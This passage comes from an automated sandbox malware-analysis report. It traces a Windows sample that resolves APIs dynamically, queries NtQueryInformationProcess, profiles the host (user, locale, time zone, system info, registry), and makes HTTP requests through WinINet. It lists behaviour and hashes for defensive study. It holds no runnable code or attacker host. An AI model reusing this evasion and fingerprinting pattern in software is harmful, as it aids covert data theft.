14924 5fa8a0 lstrcpy 14923->14924 14925 5f1a40 14924->14925 14926 5fa9b0 4 API calls 14925->14926 14927 5f1a5b 14926->14927 14928 5fa8a0 lstrcpy 14927->14928 14929 5f1a64 14928->14929 14930 5fa9b0 4 API calls 14929->14930 14931 5f1a7d 14930->14931 14932 5fa8a0 lstrcpy 14931->14932 14933 5f1a86 14932->14933 14934 5fa9b0 4 API calls 14933->14934 14935 5f1aa1 14934->14935 14936 5fa8a0 lstrcpy 14935->14936 14937 5f1aaa 14936->14937 14938 5fa9b0 4 API calls 14937->14938 14939 5f1ac3 14938->14939 14940 5fa8a0 lstrcpy 14939->14940 14941 5f1acc 14940->14941 14942 5fa9b0 4 API calls 14941->14942 14943 5f1ae7 14942->14943 14944 5fa8a0 lstrcpy 14943->14944 14945 5f1af0 14944->14945 14946 5fa9b0 4 API calls 14945->14946 14947 5f1b09 14946->14947 14948 5fa8a0 lstrcpy 14947->14948 14949 5f1b12 14948->14949 14950 5fa9b0 4 API calls 14949->14950 14951 5f1b2d 14950->14951 14952 5fa8a0 lstrcpy 14951->14952 14953 5f1b36 14952->14953 14954 5fa9b0 4 API calls 14953->14954 14955 5f1b4f 14954->14955 14956 5fa8a0 lstrcpy 14955->14956 14957 5f1b58 14956->14957 14958 5fa9b0 4 API calls 14957->14958 14959 
5f1b76 14958->14959 14960 5fa8a0 lstrcpy 14959->14960 14961 5f1b7f 14960->14961 14962 5f7500 6 API calls 14961->14962 14963 5f1b96 14962->14963 14964 5fa920 3 API calls 14963->14964 14965 5f1ba9 14964->14965 14966 5fa8a0 lstrcpy 14965->14966 14967 5f1bb2 14966->14967 14968 5fa9b0 4 API calls 14967->14968 14969 5f1bdc 14968->14969 14970 5fa8a0 lstrcpy 14969->14970 14971 5f1be5 14970->14971 14972 5fa9b0 4 API calls 14971->14972 14973 5f1c05 14972->14973 14974 5fa8a0 lstrcpy 14973->14974 14975 5f1c0e 14974->14975 15681 5f7690 GetProcessHeap RtlAllocateHeap 14975->15681 14978 5fa9b0 4 API calls 14979 5f1c2e 14978->14979 14980 5fa8a0 lstrcpy 14979->14980 14981 5f1c37 14980->14981 14982 5fa9b0 4 API calls 14981->14982 14983 5f1c56 14982->14983 14984 5fa8a0 lstrcpy 14983->14984 14985 5f1c5f 14984->14985 14986 5fa9b0 4 API calls 14985->14986 14987 5f1c80 14986->14987 14988 5fa8a0 lstrcpy 14987->14988 14989 5f1c89 14988->14989 15688 5f77c0 GetCurrentProcess IsWow64Process 14989->15688 14992 5fa9b0 4 API calls 14993 5f1ca9 14992->14993 14994 5fa8a0 lstrcpy 14993->14994 14995 5f1cb2 14994->14995 14996 5fa9b0 4 API calls 14995->14996 14997 5f1cd1 14996->14997 14998 5fa8a0 lstrcpy 14997->14998 14999 5f1cda 14998->14999 15000 5fa9b0 4 API calls 14999->15000 15001 5f1cfb 15000->15001 15002 5fa8a0 lstrcpy 15001->15002 15003 5f1d04 15002->15003 15004 5f7850 3 API calls 15003->15004 15005 5f1d14 15004->15005 15006 5fa9b0 4 API calls 15005->15006 15007 5f1d24 15006->15007 15008 5fa8a0 lstrcpy 15007->15008 15009 5f1d2d 15008->15009 15010 5fa9b0 4 API calls 15009->15010 15011 5f1d4c 15010->15011 15012 5fa8a0 lstrcpy 15011->15012 15013 5f1d55 15012->15013 15014 5fa9b0 4 API calls 15013->15014 15015 5f1d75 15014->15015 15016 5fa8a0 lstrcpy 15015->15016 15017 5f1d7e 15016->15017 15018 5f78e0 3 API calls 15017->15018 15019 5f1d8e 15018->15019 15020 5fa9b0 4 API calls 15019->15020 15021 5f1d9e 15020->15021 15022 5fa8a0 lstrcpy 15021->15022 15023 5f1da7 15022->15023 15024 5fa9b0 4 API calls 
15023->15024 15025 5f1dc6 15024->15025 15026 5fa8a0 lstrcpy 15025->15026 15027 5f1dcf 15026->15027 15028 5fa9b0 4 API calls 15027->15028 15029 5f1df0 15028->15029 15030 5fa8a0 lstrcpy 15029->15030 15031 5f1df9 15030->15031 15690 5f7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15031->15690 15034 5fa9b0 4 API calls 15035 5f1e19 15034->15035 15036 5fa8a0 lstrcpy 15035->15036 15037 5f1e22 15036->15037 15038 5fa9b0 4 API calls 15037->15038 15039 5f1e41 15038->15039 15040 5fa8a0 lstrcpy 15039->15040 15041 5f1e4a 15040->15041 15042 5fa9b0 4 API calls 15041->15042 15043 5f1e6b 15042->15043 15044 5fa8a0 lstrcpy 15043->15044 15045 5f1e74 15044->15045 15692 5f7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15045->15692 15048 5fa9b0 4 API calls 15049 5f1e94 15048->15049 15050 5fa8a0 lstrcpy 15049->15050 15051 5f1e9d 15050->15051 15052 5fa9b0 4 API calls 15051->15052 15053 5f1ebc 15052->15053 15054 5fa8a0 lstrcpy 15053->15054 15055 5f1ec5 15054->15055 15056 5fa9b0 4 API calls 15055->15056 15057 5f1ee5 15056->15057 15058 5fa8a0 lstrcpy 15057->15058 15059 5f1eee 15058->15059 15695 5f7b00 GetUserDefaultLocaleName 15059->15695 15062 5fa9b0 4 API calls 15063 5f1f0e 15062->15063 15064 5fa8a0 lstrcpy 15063->15064 15065 5f1f17 15064->15065 15066 5fa9b0 4 API calls 15065->15066 15067 5f1f36 15066->15067 15068 5fa8a0 lstrcpy 15067->15068 15069 5f1f3f 15068->15069 15070 5fa9b0 4 API calls 15069->15070 15071 5f1f60 15070->15071 15072 5fa8a0 lstrcpy 15071->15072 15073 5f1f69 15072->15073 15699 5f7b90 15073->15699 15075 5f1f80 15076 5fa920 3 API calls 15075->15076 15077 5f1f93 15076->15077 15078 5fa8a0 lstrcpy 15077->15078 15079 5f1f9c 15078->15079 15080 5fa9b0 4 API calls 15079->15080 15081 5f1fc6 15080->15081 15082 5fa8a0 lstrcpy 15081->15082 15083 5f1fcf 15082->15083 15084 5fa9b0 4 API calls 15083->15084 15085 5f1fef 15084->15085 15086 5fa8a0 lstrcpy 15085->15086 15087 5f1ff8 15086->15087 15711 5f7d80 GetSystemPowerStatus 15087->15711 15090 5fa9b0 4 API calls 15091 
5f2018 15090->15091 15092 5fa8a0 lstrcpy 15091->15092 15093 5f2021 15092->15093 15094 5fa9b0 4 API calls 15093->15094 15095 5f2040 15094->15095 15096 5fa8a0 lstrcpy 15095->15096 15097 5f2049 15096->15097 15098 5fa9b0 4 API calls 15097->15098 15099 5f206a 15098->15099 15100 5fa8a0 lstrcpy 15099->15100 15101 5f2073 15100->15101 15102 5f207e GetCurrentProcessId 15101->15102 15713 5f9470 OpenProcess 15102->15713 15105 5fa920 3 API calls 15106 5f20a4 15105->15106 15107 5fa8a0 lstrcpy 15106->15107 15108 5f20ad 15107->15108 15109 5fa9b0 4 API calls 15108->15109 15110 5f20d7 15109->15110 15111 5fa8a0 lstrcpy 15110->15111 15112 5f20e0 15111->15112 15113 5fa9b0 4 API calls 15112->15113 15114 5f2100 15113->15114 15115 5fa8a0 lstrcpy 15114->15115 15116 5f2109 15115->15116 15718 5f7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15116->15718 15119 5fa9b0 4 API calls 15120 5f2129 15119->15120 15121 5fa8a0 lstrcpy 15120->15121 15122 5f2132 15121->15122 15123 5fa9b0 4 API calls 15122->15123 15124 5f2151 15123->15124 15125 5fa8a0 lstrcpy 15124->15125 15126 5f215a 15125->15126 15127 5fa9b0 4 API calls 15126->15127 15128 5f217b 15127->15128 15129 5fa8a0 lstrcpy 15128->15129 15130 5f2184 15129->15130 15722 5f7f60 15130->15722 15133 5fa9b0 4 API calls 15134 5f21a4 15133->15134 15135 5fa8a0 lstrcpy 15134->15135 15136 5f21ad 15135->15136 15137 5fa9b0 4 API calls 15136->15137 15138 5f21cc 15137->15138 15139 5fa8a0 lstrcpy 15138->15139 15140 5f21d5 15139->15140 15141 5fa9b0 4 API calls 15140->15141 15142 5f21f6 15141->15142 15143 5fa8a0 lstrcpy 15142->15143 15144 5f21ff 15143->15144 15735 5f7ed0 GetSystemInfo wsprintfA 15144->15735 15147 5fa9b0 4 API calls 15148 5f221f 15147->15148 15149 5fa8a0 lstrcpy 15148->15149 15150 5f2228 15149->15150 15151 5fa9b0 4 API calls 15150->15151 15152 5f2247 15151->15152 15153 5fa8a0 lstrcpy 15152->15153 15154 5f2250 15153->15154 15155 5fa9b0 4 API calls 15154->15155 15156 5f2270 15155->15156 15157 5fa8a0 lstrcpy 15156->15157 15158 5f2279 15157->15158 
15737 5f8100 GetProcessHeap RtlAllocateHeap 15158->15737 15161 5fa9b0 4 API calls 15162 5f2299 15161->15162 15163 5fa8a0 lstrcpy 15162->15163 15164 5f22a2 15163->15164 15165 5fa9b0 4 API calls 15164->15165 15166 5f22c1 15165->15166 15167 5fa8a0 lstrcpy 15166->15167 15168 5f22ca 15167->15168 15169 5fa9b0 4 API calls 15168->15169 15170 5f22eb 15169->15170 15171 5fa8a0 lstrcpy 15170->15171 15172 5f22f4 15171->15172 15743 5f87c0 15172->15743 15175 5fa920 3 API calls 15176 5f231e 15175->15176 15177 5fa8a0 lstrcpy 15176->15177 15178 5f2327 15177->15178 15179 5fa9b0 4 API calls 15178->15179 15180 5f2351 15179->15180 15181 5fa8a0 lstrcpy 15180->15181 15182 5f235a 15181->15182 15183 5fa9b0 4 API calls 15182->15183 15184 5f237a 15183->15184 15185 5fa8a0 lstrcpy 15184->15185 15186 5f2383 15185->15186 15187 5fa9b0 4 API calls 15186->15187 15188 5f23a2 15187->15188 15189 5fa8a0 lstrcpy 15188->15189 15190 5f23ab 15189->15190 15748 5f81f0 15190->15748 15192 5f23c2 15193 5fa920 3 API calls 15192->15193 15194 5f23d5 15193->15194 15195 5fa8a0 lstrcpy 15194->15195 15196 5f23de 15195->15196 15197 5fa9b0 4 API calls 15196->15197 15198 5f240a 15197->15198 15199 5fa8a0 lstrcpy 15198->15199 15200 5f2413 15199->15200 15201 5fa9b0 4 API calls 15200->15201 15202 5f2432 15201->15202 15203 5fa8a0 lstrcpy 15202->15203 15204 5f243b 15203->15204 15205 5fa9b0 4 API calls 15204->15205 15206 5f245c 15205->15206 15207 5fa8a0 lstrcpy 15206->15207 15208 5f2465 15207->15208 15209 5fa9b0 4 API calls 15208->15209 15210 5f2484 15209->15210 15211 5fa8a0 lstrcpy 15210->15211 15212 5f248d 15211->15212 15213 5fa9b0 4 API calls 15212->15213 15214 5f24ae 15213->15214 15215 5fa8a0 lstrcpy 15214->15215 15216 5f24b7 15215->15216 15756 5f8320 15216->15756 15218 5f24d3 15219 5fa920 3 API calls 15218->15219 15220 5f24e6 15219->15220 15221 5fa8a0 lstrcpy 15220->15221 15222 5f24ef 15221->15222 15223 5fa9b0 4 API calls 15222->15223 15224 5f2519 15223->15224 15225 5fa8a0 lstrcpy 15224->15225 15226 5f2522 15225->15226 

                        Control-flow Graph

                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,01152398), ref: 005F98A1
                        • GetProcAddress.KERNEL32(74DD0000,011523B0), ref: 005F98BA
                        • GetProcAddress.KERNEL32(74DD0000,011523C8), ref: 005F98D2
                        • GetProcAddress.KERNEL32(74DD0000,011524E8), ref: 005F98EA
                        • GetProcAddress.KERNEL32(74DD0000,01152500), ref: 005F9903
                        • GetProcAddress.KERNEL32(74DD0000,011590C8), ref: 005F991B
                        • GetProcAddress.KERNEL32(74DD0000,01145CD0), ref: 005F9933
                        • GetProcAddress.KERNEL32(74DD0000,01145BB0), ref: 005F994C
                        • GetProcAddress.KERNEL32(74DD0000,01152248), ref: 005F9964
                        • GetProcAddress.KERNEL32(74DD0000,01152260), ref: 005F997C
                        • GetProcAddress.KERNEL32(74DD0000,01152278), ref: 005F9995
                        • GetProcAddress.KERNEL32(74DD0000,01152428), ref: 005F99AD
                        • GetProcAddress.KERNEL32(74DD0000,01145D90), ref: 005F99C5
                        • GetProcAddress.KERNEL32(74DD0000,01152440), ref: 005F99DE
                        • GetProcAddress.KERNEL32(74DD0000,01152290), ref: 005F99F6
                        • GetProcAddress.KERNEL32(74DD0000,01145C50), ref: 005F9A0E
                        • GetProcAddress.KERNEL32(74DD0000,011522A8), ref: 005F9A27
                        • GetProcAddress.KERNEL32(74DD0000,011522C0), ref: 005F9A3F
                        • GetProcAddress.KERNEL32(74DD0000,01145DF0), ref: 005F9A57
                        • GetProcAddress.KERNEL32(74DD0000,011522D8), ref: 005F9A70
                        • GetProcAddress.KERNEL32(74DD0000,01145B90), ref: 005F9A88
                        • LoadLibraryA.KERNEL32(011525C0,?,005F6A00), ref: 005F9A9A
                        • LoadLibraryA.KERNEL32(011525D8,?,005F6A00), ref: 005F9AAB
                        • LoadLibraryA.KERNEL32(01152560,?,005F6A00), ref: 005F9ABD
                        • LoadLibraryA.KERNEL32(01152548,?,005F6A00), ref: 005F9ACF
                        • LoadLibraryA.KERNEL32(011525A8,?,005F6A00), ref: 005F9AE0
                        • GetProcAddress.KERNEL32(75A70000,01152518), ref: 005F9B02
                        • GetProcAddress.KERNEL32(75290000,01152530), ref: 005F9B23
                        • GetProcAddress.KERNEL32(75290000,01152578), ref: 005F9B3B
                        • GetProcAddress.KERNEL32(75BD0000,01152590), ref: 005F9B5D
                        • GetProcAddress.KERNEL32(75450000,01145C30), ref: 005F9B7E
                        • GetProcAddress.KERNEL32(76E90000,01159008), ref: 005F9B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 005F9BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 005F9BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: fc6d2868c2d9fdd1e991d68248d97ad87a54562a2dd8e22b061a4a746f267979
                        • Instruction ID: 43e6bce7c92b70430e09bb6e56bcf3611d2179ca8f780886ab6dddb9489d58b7
                        • Opcode Fuzzy Hash: fc6d2868c2d9fdd1e991d68248d97ad87a54562a2dd8e22b061a4a746f267979
                        • Instruction Fuzzy Hash: DCA15EB55002449FD36CEFA8EE88A663BF9FF4C701744C52AE645C3264D7399843CB5A

                        Control-flow Graph

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E460E
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 005E479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4622, 005E4643, 005E45D2, 005E475A, 005E4657, 005E4765, 005E4678, 005E4713, 005E45DD, 005E473F, 005E46CD, 005E4734, 005E4683, 005E4662, 005E466D, 005E45C7, 005E474F, 005E45E8, 005E471E, 005E4638, 005E46B7, 005E46C2, 005E4770, 005E45F3, 005E4617, 005E477B, 005E462D, 005E4729, 005E46AC, 005E46D8
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated, `$`-separated, once per xref)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 79a3b2d1a9d99d30f1cfc241e9384f28fa128662222473ba593c32b062f0e0df
                        • Instruction ID: 4af30c5f19ecd239d9f598e36b52958d5ae80b7aa4db2b144cdbf43fb67b80a3
                        • Opcode Fuzzy Hash: 79a3b2d1a9d99d30f1cfc241e9384f28fa128662222473ba593c32b062f0e0df
                        • Instruction Fuzzy Hash: B14135617C26547AC63EBBA4884EE9F77B77F4B700F53D242A801522C2CBB079214D2A

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • InternetOpenA.WININET(00600DFE,00000001,00000000,00000000,00000000), ref: 005E62E1
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E6335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E6385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005E63BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E63D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005E63FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005E646D
                        • InternetCloseHandle.WININET(00000000), ref: 005E64EF
                        • InternetCloseHandle.WININET(00000000), ref: 005E64F9
                        • InternetCloseHandle.WININET(00000000), ref: 005E6503
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 372a74356ee09affc4951d3167658defac02a4581f6ed59516753f9dc0ddcf4d
                        • Instruction ID: 7398e74327c623b7cc6eef87f535c7c98f6d088956416e07f69d23a26fe2fbb7
                        • Opcode Fuzzy Hash: 372a74356ee09affc4951d3167658defac02a4581f6ed59516753f9dc0ddcf4d
                        • Instruction Fuzzy Hash: 72714D71A00258ABDF28DBA0CC49BEE7B75FF44740F108198F6096B1D4DBB46A85CF52
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005E11B7), ref: 005F7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 005F789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: fed4931e966a68f666d0b2f33f866a6d8d123ea0dba7cae30750166367371fee
                        • Instruction ID: b38d19e0b4155d3a6e8adf3b1255af9322084b6d392f048f9a85e842adbb9b2a
                        • Opcode Fuzzy Hash: fed4931e966a68f666d0b2f33f866a6d8d123ea0dba7cae30750166367371fee
                        • Instruction Fuzzy Hash: A4F04FB1944208AFC714DF98DD49FAEBBB8FB08711F10466AFA05A2680C77915058BA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 3b7ce8ec7ace62a059862e2b7f31c2c29aaf4a04d1584e26fe461ac45e7663df
                        • Instruction ID: d3c2657d10ff2ee609a988374e38e7808ae64f990fd3310c1bf85159bf243562
                        • Opcode Fuzzy Hash: 3b7ce8ec7ace62a059862e2b7f31c2c29aaf4a04d1584e26fe461ac45e7663df
                        • Instruction Fuzzy Hash: EBD05E7490030CDFCB18DFE0DC496EDBB78FB08311F000594D94562340EA305482CAAA

                        Control-flow Graph (rendered graph omitted from the extraction; legend: Executed / Not Executed)
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,01145DD0), ref: 005F9C2D
                        • GetProcAddress.KERNEL32(74DD0000,01145C70), ref: 005F9C45
                        • GetProcAddress.KERNEL32(74DD0000,011594F0), ref: 005F9C5E
                        • GetProcAddress.KERNEL32(74DD0000,01159370), ref: 005F9C76
                        • GetProcAddress.KERNEL32(74DD0000,01159430), ref: 005F9C8E
                        • GetProcAddress.KERNEL32(74DD0000,01159508), ref: 005F9CA7
                        • GetProcAddress.KERNEL32(74DD0000,0114B658), ref: 005F9CBF
                        • GetProcAddress.KERNEL32(74DD0000,0115CE58), ref: 005F9CD7
                        • GetProcAddress.KERNEL32(74DD0000,0115CE88), ref: 005F9CF0
                        • GetProcAddress.KERNEL32(74DD0000,0115D098), ref: 005F9D08
                        • GetProcAddress.KERNEL32(74DD0000,0115D080), ref: 005F9D20
                        • GetProcAddress.KERNEL32(74DD0000,01145BD0), ref: 005F9D39
                        • GetProcAddress.KERNEL32(74DD0000,01145E30), ref: 005F9D51
                        • GetProcAddress.KERNEL32(74DD0000,01145CF0), ref: 005F9D69
                        • GetProcAddress.KERNEL32(74DD0000,01145D30), ref: 005F9D82
                        • GetProcAddress.KERNEL32(74DD0000,0115D050), ref: 005F9D9A
                        • GetProcAddress.KERNEL32(74DD0000,0115D020), ref: 005F9DB2
                        • GetProcAddress.KERNEL32(74DD0000,0114B860), ref: 005F9DCB
                        • GetProcAddress.KERNEL32(74DD0000,01145AB0), ref: 005F9DE3
                        • GetProcAddress.KERNEL32(74DD0000,0115CEA0), ref: 005F9DFB
                        • GetProcAddress.KERNEL32(74DD0000,0115D038), ref: 005F9E14
                        • GetProcAddress.KERNEL32(74DD0000,0115D068), ref: 005F9E2C
                        • GetProcAddress.KERNEL32(74DD0000,0115CEB8), ref: 005F9E44
                        • GetProcAddress.KERNEL32(74DD0000,01145AD0), ref: 005F9E5D
                        • GetProcAddress.KERNEL32(74DD0000,0115D008), ref: 005F9E75
                        • GetProcAddress.KERNEL32(74DD0000,0115D0B0), ref: 005F9E8D
                        • GetProcAddress.KERNEL32(74DD0000,0115D0C8), ref: 005F9EA6
                        • GetProcAddress.KERNEL32(74DD0000,0115CF90), ref: 005F9EBE
                        • GetProcAddress.KERNEL32(74DD0000,0115CF48), ref: 005F9ED6
                        • GetProcAddress.KERNEL32(74DD0000,0115D0E0), ref: 005F9EEF
                        • GetProcAddress.KERNEL32(74DD0000,0115CFA8), ref: 005F9F07
                        • GetProcAddress.KERNEL32(74DD0000,0115CF18), ref: 005F9F1F
                        • GetProcAddress.KERNEL32(74DD0000,0115CED0), ref: 005F9F38
                        • GetProcAddress.KERNEL32(74DD0000,0115A960), ref: 005F9F50
                        • GetProcAddress.KERNEL32(74DD0000,0115CE70), ref: 005F9F68
                        • GetProcAddress.KERNEL32(74DD0000,0115CFF0), ref: 005F9F81
                        • GetProcAddress.KERNEL32(74DD0000,01145C10), ref: 005F9F99
                        • GetProcAddress.KERNEL32(74DD0000,0115CEE8), ref: 005F9FB1
                        • GetProcAddress.KERNEL32(74DD0000,011456D0), ref: 005F9FCA
                        • GetProcAddress.KERNEL32(74DD0000,0115CE10), ref: 005F9FE2
                        • GetProcAddress.KERNEL32(74DD0000,0115CDF8), ref: 005F9FFA
                        • GetProcAddress.KERNEL32(74DD0000,01145770), ref: 005FA013
                        • GetProcAddress.KERNEL32(74DD0000,01145A90), ref: 005FA02B
                        • LoadLibraryA.KERNEL32(0115CF00,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA03D
                        • LoadLibraryA.KERNEL32(0115CFC0,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA04E
                        • LoadLibraryA.KERNEL32(0115CF30,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA060
                        • LoadLibraryA.KERNEL32(0115CF60,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA072
                        • LoadLibraryA.KERNEL32(0115CF78,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA083
                        • LoadLibraryA.KERNEL32(0115CE28,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA095
                        • LoadLibraryA.KERNEL32(0115CE40,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA0A7
                        • LoadLibraryA.KERNEL32(0115CFD8,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA0B8
                        • GetProcAddress.KERNEL32(75290000,011456F0), ref: 005FA0DA
                        • GetProcAddress.KERNEL32(75290000,0115D2F0), ref: 005FA0F2
                        • GetProcAddress.KERNEL32(75290000,011590D8), ref: 005FA10A
                        • GetProcAddress.KERNEL32(75290000,0115D110), ref: 005FA123
                        • GetProcAddress.KERNEL32(75290000,01145790), ref: 005FA13B
                        • GetProcAddress.KERNEL32(73440000,0114B680), ref: 005FA160
                        • GetProcAddress.KERNEL32(73440000,011459D0), ref: 005FA179
                        • GetProcAddress.KERNEL32(73440000,0114B720), ref: 005FA191
                        • GetProcAddress.KERNEL32(73440000,0115D260), ref: 005FA1A9
                        • GetProcAddress.KERNEL32(73440000,0115D248), ref: 005FA1C2
                        • GetProcAddress.KERNEL32(73440000,01145730), ref: 005FA1DA
                        • GetProcAddress.KERNEL32(73440000,01145970), ref: 005FA1F2
                        • GetProcAddress.KERNEL32(73440000,0115D338), ref: 005FA20B
                        • GetProcAddress.KERNEL32(752C0000,011459B0), ref: 005FA22C
                        • GetProcAddress.KERNEL32(752C0000,01145A10), ref: 005FA244
                        • GetProcAddress.KERNEL32(752C0000,0115D278), ref: 005FA25D
                        • GetProcAddress.KERNEL32(752C0000,0115D290), ref: 005FA275
                        • GetProcAddress.KERNEL32(752C0000,01145990), ref: 005FA28D
                        • GetProcAddress.KERNEL32(74EC0000,0114B7C0), ref: 005FA2B3
                        • GetProcAddress.KERNEL32(74EC0000,0114B770), ref: 005FA2CB
                        • GetProcAddress.KERNEL32(74EC0000,0115D1A0), ref: 005FA2E3
                        • GetProcAddress.KERNEL32(74EC0000,01145890), ref: 005FA2FC
                        • GetProcAddress.KERNEL32(74EC0000,011459F0), ref: 005FA314
                        • GetProcAddress.KERNEL32(74EC0000,0114B978), ref: 005FA32C
                        • GetProcAddress.KERNEL32(75BD0000,0115D1D0), ref: 005FA352
                        • GetProcAddress.KERNEL32(75BD0000,01145A30), ref: 005FA36A
                        • GetProcAddress.KERNEL32(75BD0000,01158F58), ref: 005FA382
                        • GetProcAddress.KERNEL32(75BD0000,0115D140), ref: 005FA39B
                        • GetProcAddress.KERNEL32(75BD0000,0115D200), ref: 005FA3B3
                        • GetProcAddress.KERNEL32(75BD0000,011458B0), ref: 005FA3CB
                        • GetProcAddress.KERNEL32(75BD0000,011456B0), ref: 005FA3E4
                        • GetProcAddress.KERNEL32(75BD0000,0115D2A8), ref: 005FA3FC
                        • GetProcAddress.KERNEL32(75BD0000,0115D1E8), ref: 005FA414
                        • GetProcAddress.KERNEL32(75A70000,011457D0), ref: 005FA436
                        • GetProcAddress.KERNEL32(75A70000,0115D1B8), ref: 005FA44E
                        • GetProcAddress.KERNEL32(75A70000,0115D3C8), ref: 005FA466
                        • GetProcAddress.KERNEL32(75A70000,0115D218), ref: 005FA47F
                        • GetProcAddress.KERNEL32(75A70000,0115D230), ref: 005FA497
                        • GetProcAddress.KERNEL32(75450000,011457B0), ref: 005FA4B8
                        • GetProcAddress.KERNEL32(75450000,01145850), ref: 005FA4D1
                        • GetProcAddress.KERNEL32(75DA0000,011457F0), ref: 005FA4F2
                        • GetProcAddress.KERNEL32(75DA0000,0115D2C0), ref: 005FA50A
                        • GetProcAddress.KERNEL32(6F070000,01145A50), ref: 005FA530
                        • GetProcAddress.KERNEL32(6F070000,01145A70), ref: 005FA548
                        • GetProcAddress.KERNEL32(6F070000,01145870), ref: 005FA560
                        • GetProcAddress.KERNEL32(6F070000,0115D170), ref: 005FA579
                        • GetProcAddress.KERNEL32(6F070000,01145810), ref: 005FA591
                        • GetProcAddress.KERNEL32(6F070000,01145710), ref: 005FA5A9
                        • GetProcAddress.KERNEL32(6F070000,011458D0), ref: 005FA5C2
